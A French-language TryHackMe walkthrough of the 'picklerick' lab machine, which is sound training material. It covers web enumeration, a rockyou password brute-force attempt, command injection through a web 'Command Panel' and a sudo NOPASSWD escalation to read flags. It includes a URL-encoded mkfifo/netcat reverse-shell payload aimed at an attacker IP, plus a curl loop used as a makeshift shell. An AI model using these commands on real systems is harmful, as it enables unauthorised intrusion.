Try Hack Me Walkthrough - picklerick¶
Machine ciblée : picklerick.
Répertoire : /home/kali/picklerick
Temps passé dessus :
Changelog du template¶
Version 1.0 - Sep. 2022 : création du template de base pour HackTheBox
Version 1.1 - Oct. 2022 : Rajout des scan nmap et des commandes de base
Version 1.2 - Nov. 2022 : Rajout des redirection pour éviter les retours d’erreur et du domaine pour être compliant avec TryHackMe
Version 1.3 - Nov. 2022 : Ajout du scan UDP + de l’export vers searchsploit
Version 1.4 - Dec. 2022 : Changement de l’export vers searchsploit pour gagner du temps + rajout des scripts vuln sur le full pour confirmer.
Phase 1 : Reconnaissance¶
┌──(kali㉿kali)-[~]
└─$
name="picklerick"
repository="/home/kali/$name"
ip="10.10.142.156"
domain='thm'
cd $repository 2&>/dev/null || mkdir $repository && cd $repository
grep "$ip $name ${name}.${domain}" /etc/hosts >/dev/null || echo "$ip $name ${name}.${domain}" | sudo tee -a /etc/hosts
nmap -Pn -A -T5 --top-port 1000 -oN $repository/txt -oX $repository/sploitable $ip
searchsploit --nmap $repository/sploitable
nmap -Pn -A -T5 -p - --script vuln -oN $repository/full -oX $repository/fullsploitable $ip
sudo nmap -Pn -A -T5 -sU -p - -oN $repository/udp -oX $repository/udploitable $ip
searchsploit --nmap $repository/udploitable
Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-21 06:31 EST
Warning: 10.10.142.156 giving up on port because retransmission cap hit (2).
Nmap scan report for picklerick (10.10.142.156)
Host is up (0.084s latency).
Not shown: 988 closed tcp ports (conn-refused)
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5b8679ff99744b9052e97f4777291ba5 (RSA)
| 256 2546a139ab30859175c94aafa4710438 (ECDSA)
|_ 256 9360abc7cae19e6816a8c6dfe052da10 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Rick is sup4r cool
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 331.05 seconds
Donc on a pas grand chose hormi un site web et du ssh. Well … On regarde le code source de la page par défaut et on envoie un gobuster :
<!--
Note to self, remember username!
Username: R1ckRul3s
-->
┌──(kali㉿kali)-[~/picklerick]
└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$name
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://picklerick
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/21 06:36:29 Starting gobuster in directory enumeration mode
===============================================================
/assets (Status: 301) [Size: 309] [--> http://picklerick/assets/]
Bon, le gobuster en directory ne trouve pas grand chose, essayons avec des fichiers en plus :
┌──(kali㉿kali)-[~/picklerick]
└─$ gobuster dir -w /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt -u http://$name
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://picklerick
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/01/05 17:02:56 Starting gobuster in directory enumeration mode
===============================================================
/login.php (Status: 200) [Size: 882]
/index.html (Status: 200) [Size: 1062]
/.htaccess (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 17]
/. (Status: 200) [Size: 1062]
/.html (Status: 403) [Size: 290]
/portal.php (Status: 302) [Size: 0] [--> /login.php]
/.php (Status: 403) [Size: 289]
On trouve un peu plus de truc : on a par exemple un /robots.txt qui peut avoir des informations importantes et le /login.php. On va tenter un petit bruteforce tout gentil sur la page d’authentification :
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/robots.txt
Wubbalubbadubdub
┌──(kali㉿kali)-[~/picklerick]
└─$ wfuzz -c -w /usr/share/wordlists/rockyou.txt -d "username=R1ckRul3s&password=FUZZ&sub=Login" --hl 27 http://$name/login.php
Bon, il sert à rien celui là, c’était cool d’espérer ! Mais si on essayé avec Wubbalubbadubdub trouvé dans le fichier robots.txt ?
Phase 2 : Analyse¶
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/login.php -d "username=R1ckRul3s&password=Wubbalubbadubdub&sub=Login" -v
* Trying 10.10.142.156:80...
* Connected to picklerick (10.10.142.156) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Content-Length: 54
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:27:24 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=k8ei2hp87vf8tfmte53m1fvp81; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /portal.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host picklerick left intact
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/login.php -d "username=R1ckRul3s&password=Wubbalubbadubdub&sub=Login" -vL
* Trying 10.10.142.156:80...
* Connected to picklerick (10.10.142.156) port 80 (#0)
> POST /login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Content-Length: 54
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:49:35 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=1q4qj0l14567f4fvr4m6qhkd80; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /portal.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host picklerick left intact
* Issue another request to this URL: 'http://picklerick/portal.php'
* Switch from POST to GET
* Found bundle for host: 0x55caf1b26d90 [serially]
* Can not multiplex, even if we wanted to
* Re-using existing connection #0 with host picklerick
* Connected to picklerick (10.10.142.156) port 80 (#0)
> GET /portal.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:49:35 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=itgi6vtgiv73pj34hi7ulq14m3; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /login.php
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host picklerick left intact
* Issue another request to this URL: 'http://picklerick/login.php'
* Found bundle for host: 0x55caf1b26d90 [serially]
* Can not multiplex, even if we wanted to
* Re-using existing connection #0 with host picklerick
* Connected to picklerick (10.10.142.156) port 80 (#0)
> GET /login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 05 Jan 2023 16:49:35 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Set-Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4; path=/
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Vary: Accept-Encoding
< Content-Length: 882
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
</head>
<body>
<div class="container">
</br><img width="300" src="assets/portal.jpg"><h3>Portal Login Page</h3></br>
<form name="input" action="" method="post">
<label for="username">Username:</label><input type="text" class="form-control" value="" id="username" name="username" />
<label for="password">Password:</label><input type="password" class="form-control" value="" id="password" name="password" />
</br><input type="submit" value="Login" class="btn btn-success" name="sub"/>
</form>
</div>
</body>
</html>
* Connection #0 to host picklerick left intact
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/login.php -d "username=R1ckRul3s&password=Wubbalubbadubdub&sub=Login" -H "Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4" --proxy http://127.0.0.1:8080 -vL
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
> POST http://picklerick/login.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4
> Content-Length: 54
> Content-Type: application/x-www-form-urlencoded
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 302 Found
< Date: Thu, 05 Jan 2023 16:50:32 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Location: /portal.php
< Content-Length: 0
< Connection: close
< Content-Type: text/html; charset=UTF-8
<
* Closing connection 0
* Issue another request to this URL: 'http://picklerick/portal.php'
* Switch from POST to GET
* Hostname 127.0.0.1 was found in DNS cache
* Trying 127.0.0.1:8080...
* Connected to 127.0.0.1 (127.0.0.1) port 8080 (#1)
> GET http://picklerick/portal.php HTTP/1.1
> Host: picklerick
> User-Agent: curl/7.85.0
> Accept: */*
> Proxy-Connection: Keep-Alive
> Cookie: PHPSESSID=lgmms9kglml9odjjvicvrcamp4
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Thu, 05 Jan 2023 16:50:32 GMT
< Server: Apache/2.4.18 (Ubuntu)
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Vary: Accept-Encoding
< Content-Length: 1294
< Connection: close
< Content-Type: text/html; charset=UTF-8
<
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand" href="#">Rick Portal</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="#">Commands</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Creatures</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Beth Clone Notes</a></li>
</ul>
</div>
</nav>
<div class="container">
<form name="input" action="" method="post">
<h3>Command Panel</h3></br>
<input type="text" class="form-control" name="command" placeholder="Commands"/></br>
<input type="submit" value="Execute" class="btn btn-success" name="sub"/>
</form>
<!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
</div>
</body>
</html>
* Closing connection 1
Info : J’ai gardé la forme avec Curl parce que je la trouve plutôt intéressante. Dans la première requête, on voit qu’il nous renvoie un cookie, valide nos credentials mais ne nous redirige pas. Avec un -L, ondevrait suivre la redirection, mais ça ne passe pas non plus, la faute au cookie que l’on a pas paramétré. Il faut donc le -H em plus. J’ai gardé le --proxy pour avoir la requête présente sous burp également.
On note un champs commenté encore, qui ressemble à de la base64. Regardons plus en détail :
┌──(kali㉿kali)-[~/picklerick]
└─$ echo "Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==" | base64 -d 2> /dev/null
VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA=
ça ressemble encore à de la base64 … Rééssayons.
┌──(kali㉿kali)-[~/picklerick]
└─$ while [ "$base64" != '' ]; do base64=`echo $base64 |base64 -d 2>/dev/null`; echo $base64 ;done
VmpGU1NtVkdTWGxTYkdScFUwWktjRlZyVmt0VE1WWnhVMjA1VG1KSGVIbFhhMXBoVlZaV1ZVMUVhejA=
VjFSSmVGSXlSbGRpU0ZKcFVrVktTMVZxU205TmJHeHlXa1phVVZWVU1Eaz0
V1RJeFIyRldiSFJpUkVKS1VqSm9NbGxyWkZaUVVUMDk=
WTIxR2FWbHRiREJKUjJoMllrZFZQUT09
Y21GaVltbDBJR2h2YkdVPQ==
cmFiYml0IGhvbGU=
rabbit hole
��ۊ
C’est mon tout premier rabbit hole (=> fausse piste) vraiment décrit comme tel :o
Phase 3 : user mais pas trop¶
Reprennons à notre site web, ce dernier propose un Command Panel. Est-ce que ça ne serait pas une manière d’éxécuter du code ?
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/portal.php -d "command=id&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand" href="#">Rick Portal</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="#">Commands</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Creatures</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Beth Clone Notes</a></li>
</ul>
</div>
</nav>
<div class="container">
<form name="input" action="" method="post">
<h3>Command Panel</h3></br>
<input type="text" class="form-control" name="command" placeholder="Commands"/></br>
<input type="submit" value="Execute" class="btn btn-success" name="sub"/>
</form>
</br><pre>uid=33(www-data) gid=33(www-data) groups=33(www-data)
</pre> <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
</div>
</body>
</html>
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/portal.php -d "command=ls+-l&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand" href="#">Rick Portal</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="#">Commands</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Creatures</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Beth Clone Notes</a></li>
</ul>
</div>
</nav>
<div class="container">
<form name="input" action="" method="post">
<h3>Command Panel</h3></br>
<input type="text" class="form-control" name="command" placeholder="Commands"/></br>
<input type="submit" value="Execute" class="btn btn-success" name="sub"/>
</form>
</br><pre>total 32
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4096 Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1105 Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1062 Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1438 Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2044 Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txt
</pre> <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
</div>
</body>
</html>
On voit donc que l’on a plusiers fichiers : Sup3rS3cretPickl3Ingred.txt et clue.txt nous sont inconnus. Regardons :
N.B: clue est un indice. Ne l’ouvrez pas si vous voulez la jouer réaliste !
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/Sup3rS3cretPickl3Ingred.txt --proxy http://127.0.0.1:8080
mr. meeseek hair
On a notre premier ingrédient. Continuons, pouvons-nous nous faire un reverse shell plus sympa ? Pour ça, direction revshell et on test :
┌──(kali㉿kali)-[~/picklerick]
└─$ curl http://picklerick/portal.php -d "command=rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.8.23.82%203333%20%3E%2Ftmp%2Ff&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080
<!DOCTYPE html>
<html lang="en">
<head>
<title>Rick is sup4r cool</title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/bootstrap.min.css">
<script src="assets/jquery.min.js"></script>
<script src="assets/bootstrap.min.js"></script>
</head>
<body>
<nav class="navbar navbar-inverse">
<div class="container">
<div class="navbar-header">
<a class="navbar-brand" href="#">Rick Portal</a>
</div>
<ul class="nav navbar-nav">
<li class="active"><a href="#">Commands</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Creatures</a></li>
<li><a href="/denied.php">Potions</a></li>
<li><a href="/denied.php">Beth Clone Notes</a></li>
</ul>
</div>
</nav>
<div class="container">
<form name="input" action="" method="post">
<h3>Command Panel</h3></br>
<input type="text" class="form-control" name="command" placeholder="Commands"/></br>
<input type="submit" value="Execute" class="btn btn-success" name="sub"/>
</form>
</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'> <!-- Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0== -->
</div>
</body>
</html>
Bon, ça sera pas celui là. J’en ai essayé une bonne dizaine, il n’y a rien à faire, les reverses shells passent pas … On va devoir se contenter de la commande injection que l’on a déjà. Ça m’a rapidement soulé de chercher à changer la commande dans la requête CURL, et je voulais garder ce process alors j’me suis créer mon petit reverse shell à moi.
┌──(kali㉿kali)-[~/picklerick]
└─$ while 1=1; do echo -n "La commande à lancer ? "; read cmd ; curl http://picklerick/portal.php -d "command=$cmd&sub=Execute" -H "Cookie: PHPSESSID=cd1fi5aogudpk8qm0lp6hq16i6" --proxy http://127.0.0.1:8080; done
La commande à lancer ? ls /home
<pre>
rick
ubuntu
</pre>
La commande à lancer ? ls /home/rick
<pre>
second ingredients
</pre>
La commande à lancer ? cat /home/rick/second\\ ingredients
</br><p><u>Command disabled</u> to make it hard for future <b>PICKLEEEE RICCCKKKK</b>.</p><img src='assets/fail.gif'>
La commande à lancer ? less /home/rick/second\\ ingredients
<pre>
1 jerry tear
</pre>
Phase 4 : root mais pas trop¶
Ok, on a donc réussi à avoir le 2nd. Mon flair de détective me dit que le troisième doit se trouver dans le répertoire root. Comme souvent dans les CTF, on en a un dans le dossier utilisateur et un dans le dossier root. Voyons voir si l’on peut devenir root :
La commande à lancer ? sudo -l
<pre>
Matching Defaults entries for www-data on ip-10-10-142-156.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-10-10-142-156.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALL
</pre>
La commande à lancer ? sudo ls /root
<pre>
3rd.txt
snap
</pre>
La commande à lancer ? sudo less /root/3rd.txt
<pre>
3rd ingredients: fleeb juice
</pre>
Bon, notre espèce de shell revisité a fonctionné, on a les 3 ingrédients !
Questions :¶
What is the first ingredient Rick needs?¶
mr. meeseek hair
Whats the second ingredient Rick needs?¶
1 jerry tear
Whats the final ingredient Rick needs?¶
fleeb juice
Récapitulatif¶
C’était un chall que j’avais commencé il y a un moment sans vraiment me mettre dedans. Je me suis relancé dessus parce que j’avais un peu de temps, il est très sympathique. On remarque qu’il faut utiliser différentes méthodes pour son énumération, ou sinon demander à gobuster de rajouter des prefixes après (.php, .txt … ça fait beaucoup).
Je suis resté bloqué trop longtemps sur la partie revershell, ça m’a pas mal frustré même. Bon, côté sécu, www-data en sudo NOPASSWD ? Sérieux ? hormi ce point noir, le reste est vraiment sympathique et réaliste. J’ai bien aimé le rabbithole !